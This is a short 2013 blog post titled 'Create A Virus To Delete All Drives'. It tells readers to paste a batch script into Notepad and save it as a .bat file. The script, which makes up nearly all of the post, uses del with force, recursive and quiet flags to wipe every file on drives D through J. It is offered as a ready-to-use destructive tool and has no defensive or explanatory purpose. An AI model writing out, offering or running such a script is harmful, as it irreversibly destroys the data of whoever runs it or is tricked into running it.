Monday 11 March 2013

Create A Virus To Delete All Drives

Create a virus using notepad to delete all drives..
Copy Paste the below code to notepad and save it as Virus.bat or anything but extension should be .bat




@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

No comments:

Post a Comment